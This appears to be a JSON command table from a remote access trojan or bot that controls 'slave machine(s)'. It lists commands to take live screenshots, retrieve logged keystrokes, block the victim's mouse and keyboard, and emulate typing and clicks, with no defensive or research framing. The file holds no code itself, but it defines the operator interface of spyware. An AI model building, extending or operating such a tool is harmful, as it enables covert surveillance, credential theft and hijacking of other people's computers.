{
	"commands":
	[
	{
	"command":"info",
	"description":"get basic information about slave machine(s)"
	},
	{
	"command":"msgbox",
	"description":"/msgbox <Title>;;<Message>"
	},
	{
	"command":"screenshot",
	"description":"retrieve live screenshot of slave machine(s)"
	},
	{
	"command":"getkeylog",
	"description":"return the keystrokes recorded since the last call to this command"
	},
	{
	"command":"blockinput",
	"description":"blocks user input from mouse and keyboard for upto a maximum of 1 minute"
	},
	{
	"command":"unblockinput",
	"description":"resumes user input from mouse and keyboard"
	},
	{
	"command":"keypress",
	"description":"emulate keystrokes: /keypress stringToType"
	},
	{
	"command":"lclick",
	"description":"emulate left click: /lclick <repetitions> <interval in ms>"
	},
	{
	"command":"rclick",
	"description":"emulate right click: /rclick <repetitions> <interval in ms>"
	},
	{
	"command":"mclick",
	"description":"emulate middle click: /mclick <repetitions> <interval in ms>"
	}
	]
}